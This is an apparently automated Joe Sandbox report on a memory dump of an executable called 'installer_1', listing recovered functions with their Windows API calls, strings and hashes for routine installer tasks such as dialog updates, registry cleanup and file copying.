Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

@rD, xrefs: 00404402
%u.%u%s%s, xrefs: 00404444

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656997772.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.1656576981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1656559341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656681058.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1656717501.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
